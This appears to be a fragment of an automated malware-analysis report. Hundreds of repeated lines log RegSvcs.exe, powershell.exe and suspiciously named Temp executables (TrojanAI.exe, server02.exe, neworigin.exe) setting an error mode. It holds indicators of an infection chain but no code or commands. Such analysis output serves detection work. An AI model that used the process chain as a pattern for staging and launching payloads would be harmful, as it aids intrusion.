Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
